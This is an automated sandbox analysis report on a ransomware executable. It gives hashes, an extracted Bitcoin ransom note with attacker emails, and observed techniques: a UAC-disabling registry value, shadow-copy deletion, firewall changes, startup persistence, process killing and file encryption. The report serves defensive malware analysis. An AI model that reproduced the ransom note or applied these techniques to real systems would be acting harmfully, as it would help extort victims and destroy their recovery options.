6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08

Analysis

max time kernel
151s
max time network
144s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
10/02/2023, 08:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
Size

1.2MB
MD5

e07ee232400dafd802235b90e0e7e056
SHA1

49ab07c411e63e8ad305b58489c69fded1f2db13
SHA256

6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08
SHA512

6607ba5bf390666bf7d3487984c3241783a5137fa2f3af3bc8173a7a1520d1fe5456512cb6eecd613b5ccb30d5f0a41df9987886d1818269068f6fd27958ac41
SSDEEP

24576:Kwh7cD9+IBdH0oIX68Ta7fGXbt8RRnUtX642Rg0ybdDHSF1dRiDHBT2c+T:H7cDUIBdH0Pe7FnUtXh0wSVRi7BT2c+T

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Extracted

Path

\??\c:\Restore_Your_Files.txt

Ransom Note

Emails

[email protected]

Extracted

Path

\??\c:\$Recycle.Bin\Restore_Your_Files.txt

Ransom Note

Emails

[email protected]

Extracted

Path

\??\c:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\Restore_Your_Files.txt

Ransom Note

All Your Files Are Locked And Important Data Downloaded ! Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You . Your ID : NEOMB If You Want To Restore Them Email Us : [email protected] If You Do Not Receive A Response Within 24 Hours, Send A Message To Our Second Email : [email protected] To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin . Every Day The Delay Increases The Price !! The Decryption Price Depends On How Fast You Write To Us Email. We Deliver The Decryptor Immediately After Payment , Please Write Your System ID In The Subject Of Your E-mail. If Payment Is Not Made We Will Sell Or Publish Your Data. What is the guarantee ! Before Payment You Can Send Some Files For Decryption Test. If We Do Not Fulfill Our Obligations, No One Does Business With Us , Our Reputation Is Important To Us It's Just Business To Get Benefits. =============================================================================== Attention ! Do Not Rename,Modify Encrypted Files . Do Not Try To Recover Files With Free Decryptors Or Third-Party Programs And Antivirus Solutions Because It May Make Decryption Harder Or Destroy Your Files Forever ! =============================================================================== Buy Bitcoin ! https://www.kraken.com/learn/buy-bitcoin-btc https://www.coinbase.com/how-to-buy/bitcoinAll Your Files Are Locked And Important Data Downloaded ! Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You . Your ID : NEOMB If You Want To Restore Them Email Us : [email protected] If You Do Not Receive A Response Within 24 Hours, Send A Message To Our Second Email : [email protected] To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin . Every Day The Delay Increases The Price !! The Decryption Price Depends On How Fast You Write To Us Email. We Deliver The Decryptor Immediately After Payment , Please Write Your System ID In The Subject Of Your E-mail. If Payment Is Not Made We Will Sell Or Publish Your Data. What is the guarantee ! Before Payment You Can Send Some Files For Decryption Test. If We Do Not Fulfill Our Obligations, No One Does Business With Us , Our Reputation Is Important To Us It's Just Business To Get Benefits. =============================================================================== Attention ! Do Not Rename,Modify Encrypted Files . Do Not Try To Recover Files With Free Decryptors Or Third-Party Programs And Antivirus Solutions Because It May Make Decryption Harder Or Destroy Your Files Forever ! =============================================================================== Buy Bitcoin ! https://www.kraken.com/learn/buy-bitcoin-btc https://www.coinbase.com/how-to-buy/bitcoinAll Your Files Are Locked And Important Data Downloaded ! Your Files Are No Longer Accessible Don't Waste Your Time, Without Our Decryption Program Nobody Can't Help You . Your ID : NEOMB If You Want To Restore Them Email Us : [email protected] If You Do Not Receive A Response Within 24 Hours, Send A Message To Our Second Email : [email protected] To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin . Every Day The Delay Increases The Price !! The Decryption Price Depends On How Fast You Write To Us Email. We Deliver The Decryptor Immediately After Payment , Please Write Your System ID In The Subject Of Your E-mail. If Payment Is Not Made We Will Sell Or Publish Your Data. What is the guarantee ! Before Payment You Can Send Some Files For Decryption Test. If We Do Not Fulfill Our Obligations, No One Does Business With Us , Our Reputation Is Important To Us It's Just Business To Get Benefits. =============================================================================== Attention ! Do Not Rename,Modify Encrypted Files . Do Not Try To Recover Files With Free Decryptors Or Third-Party Programs And Antivirus Solutions Because It May Make Decryption Harder Or Destroy Your Files Forever ! =============================================================================== Buy Bitcoin ! https://www.kraken.com/learn/buy-bitcoin-btc https://www.coinbase.com/how-to-buy/bitcoin

Emails

[email protected]

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Creates new service(s) 1 TTPs
persistence

New Service
T1050

Modifies Windows Firewall 1 TTPs 3 IoCs

evasion

Modify Existing Service

T1031

pid	Process
1608	netsh.exe
1392	netsh.exe
528	netsh.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\I:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\K:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\S:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\T:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\V:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\A:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\G:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\L:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\P:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\W:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\Y:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\Z:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\B:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\E:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\H:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\M:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\Q:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\X:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\J:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\N:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\O:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\R:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened (read-only)	\??\U:	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	api.ipify.org

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\ipsptb.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\zh-tw.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_altgr.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ro.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\uz.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\baseAltGr_rtl.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ba.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\System\ado\en-US\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\System\msadc\en-US\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ms.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ug.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\MSInfo\es-ES\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\TextConv\es-ES\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ne.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\hwrfrash.dat	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\ipscht.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ps.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ga.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\kab.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\System\ado\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\fi.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_2.emf	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\System\ado\de-DE\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\de-DE\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\es-ES\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ko.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ru.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\el.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\fur.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\he.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ka.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\fr.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\nn.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\ipschs.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\7-Zip\Lang\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\af.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\System\fr-FR\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\SpeechEngines\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\ku-ckb.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\sl.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\sr-spl.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\MSInfo\es-ES\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\eu.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\th.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\vi.txt_[[email protected]].NBV	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\hwrdeslm.dat	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\es-ES\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\hwrenclm.dat	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\hwresslm.dat	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\Restore_Your_Files.txt	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysMain.sys	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
File opened for modification	C:\Windows\SysMain.sys	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1496	sc.exe
1648	sc.exe
1640	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1488	schtasks.exe

Delays execution with timeout.exe 8 IoCs

evasion

pid	Process
1492	timeout.exe
1088	timeout.exe
1128	timeout.exe
972	timeout.exe
468	timeout.exe
904	timeout.exe
1492	timeout.exe
1160	timeout.exe

Enumerates processes with tasklist 1 TTPs 9 IoCs

Process Discovery

T1057

pid	Process
1384	tasklist.exe
976	tasklist.exe
624	tasklist.exe
1608	tasklist.exe
1016	tasklist.exe
888	tasklist.exe
1792	tasklist.exe
1540	tasklist.exe
1192	tasklist.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
744	systeminfo.exe
1692	systeminfo.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1864	vssadmin.exe
1596	vssadmin.exe

Kills process with taskkill 39 IoCs

evasion

pid	Process
996	taskkill.exe
596	taskkill.exe
660	taskkill.exe
1276	taskkill.exe
1076	taskkill.exe
1724	taskkill.exe
820	taskkill.exe
1276	taskkill.exe
568	taskkill.exe
1124	taskkill.exe
824	taskkill.exe
1128	taskkill.exe
1820	taskkill.exe
1808	taskkill.exe
2020	taskkill.exe
772	taskkill.exe
2008	taskkill.exe
1256	taskkill.exe
1272	taskkill.exe
1768	taskkill.exe
840	taskkill.exe
1732	taskkill.exe
1408	taskkill.exe
360	taskkill.exe
1016	taskkill.exe
1084	taskkill.exe
912	taskkill.exe
1636	taskkill.exe
1688	taskkill.exe
1196	taskkill.exe
1812	taskkill.exe
888	taskkill.exe
596	taskkill.exe
1716	taskkill.exe
1616	taskkill.exe
432	taskkill.exe
1392	taskkill.exe
1384	taskkill.exe
1060	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
684	reg.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
976	tasklist.exe
976	tasklist.exe
624	tasklist.exe
624	tasklist.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	976	tasklist.exe
Token: SeDebugPrivilege	624	tasklist.exe
Token: SeBackupPrivilege	1044	vssvc.exe
Token: SeRestorePrivilege	1044	vssvc.exe
Token: SeAuditPrivilege	1044	vssvc.exe
Token: SeDebugPrivilege	1540	tasklist.exe
Token: SeDebugPrivilege	1192	tasklist.exe
Token: SeIncreaseQuotaPrivilege	360	WMIC.exe
Token: SeSecurityPrivilege	360	WMIC.exe
Token: SeTakeOwnershipPrivilege	360	WMIC.exe
Token: SeLoadDriverPrivilege	360	WMIC.exe
Token: SeSystemProfilePrivilege	360	WMIC.exe
Token: SeSystemtimePrivilege	360	WMIC.exe
Token: SeProfSingleProcessPrivilege	360	WMIC.exe
Token: SeIncBasePriorityPrivilege	360	WMIC.exe
Token: SeCreatePagefilePrivilege	360	WMIC.exe
Token: SeBackupPrivilege	360	WMIC.exe
Token: SeRestorePrivilege	360	WMIC.exe
Token: SeShutdownPrivilege	360	WMIC.exe
Token: SeDebugPrivilege	360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	360	WMIC.exe
Token: SeRemoteShutdownPrivilege	360	WMIC.exe
Token: SeUndockPrivilege	360	WMIC.exe
Token: SeManageVolumePrivilege	360	WMIC.exe
Token: 33	360	WMIC.exe
Token: 34	360	WMIC.exe
Token: 35	360	WMIC.exe
Token: SeIncreaseQuotaPrivilege	360	WMIC.exe
Token: SeSecurityPrivilege	360	WMIC.exe
Token: SeTakeOwnershipPrivilege	360	WMIC.exe
Token: SeLoadDriverPrivilege	360	WMIC.exe
Token: SeSystemProfilePrivilege	360	WMIC.exe
Token: SeSystemtimePrivilege	360	WMIC.exe
Token: SeProfSingleProcessPrivilege	360	WMIC.exe
Token: SeIncBasePriorityPrivilege	360	WMIC.exe
Token: SeCreatePagefilePrivilege	360	WMIC.exe
Token: SeBackupPrivilege	360	WMIC.exe
Token: SeRestorePrivilege	360	WMIC.exe
Token: SeShutdownPrivilege	360	WMIC.exe
Token: SeDebugPrivilege	360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	360	WMIC.exe
Token: SeRemoteShutdownPrivilege	360	WMIC.exe
Token: SeUndockPrivilege	360	WMIC.exe
Token: SeManageVolumePrivilege	360	WMIC.exe
Token: 33	360	WMIC.exe
Token: 34	360	WMIC.exe
Token: 35	360	WMIC.exe
Token: SeDebugPrivilege	1384	tasklist.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	1276	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	360	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	888	taskkill.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeDebugPrivilege	1608	tasklist.exe
Token: SeDebugPrivilege	1084	taskkill.exe
Token: SeDebugPrivilege	596	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	772	taskkill.exe
Token: SeDebugPrivilege	996	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 544 wrote to memory of 1540	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	27
PID 544 wrote to memory of 1540	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	27
PID 544 wrote to memory of 1540	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	27
PID 544 wrote to memory of 1540	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	27
PID 1540 wrote to memory of 976	1540	cmd.exe	28
PID 1540 wrote to memory of 976	1540	cmd.exe	28
PID 1540 wrote to memory of 976	1540	cmd.exe	28
PID 1540 wrote to memory of 976	1540	cmd.exe	28
PID 1540 wrote to memory of 2040	1540	cmd.exe	29
PID 1540 wrote to memory of 2040	1540	cmd.exe	29
PID 1540 wrote to memory of 2040	1540	cmd.exe	29
PID 1540 wrote to memory of 2040	1540	cmd.exe	29
PID 544 wrote to memory of 1688	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	31
PID 544 wrote to memory of 1688	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	31
PID 544 wrote to memory of 1688	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	31
PID 544 wrote to memory of 1688	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	31
PID 1688 wrote to memory of 1640	1688	cmd.exe	32
PID 1688 wrote to memory of 1640	1688	cmd.exe	32
PID 1688 wrote to memory of 1640	1688	cmd.exe	32
PID 1688 wrote to memory of 1640	1688	cmd.exe	32
PID 544 wrote to memory of 1352	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	33
PID 544 wrote to memory of 1352	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	33
PID 544 wrote to memory of 1352	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	33
PID 544 wrote to memory of 1352	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	33
PID 1352 wrote to memory of 1496	1352	cmd.exe	34
PID 1352 wrote to memory of 1496	1352	cmd.exe	34
PID 1352 wrote to memory of 1496	1352	cmd.exe	34
PID 1352 wrote to memory of 1496	1352	cmd.exe	34
PID 544 wrote to memory of 1792	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	35
PID 544 wrote to memory of 1792	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	35
PID 544 wrote to memory of 1792	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	35
PID 544 wrote to memory of 1792	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	35
PID 1792 wrote to memory of 1648	1792	cmd.exe	36
PID 1792 wrote to memory of 1648	1792	cmd.exe	36
PID 1792 wrote to memory of 1648	1792	cmd.exe	36
PID 1792 wrote to memory of 1648	1792	cmd.exe	36
PID 544 wrote to memory of 1296	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	37
PID 544 wrote to memory of 1296	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	37
PID 544 wrote to memory of 1296	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	37
PID 544 wrote to memory of 1296	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	37
PID 544 wrote to memory of 1460	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	38
PID 544 wrote to memory of 1460	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	38
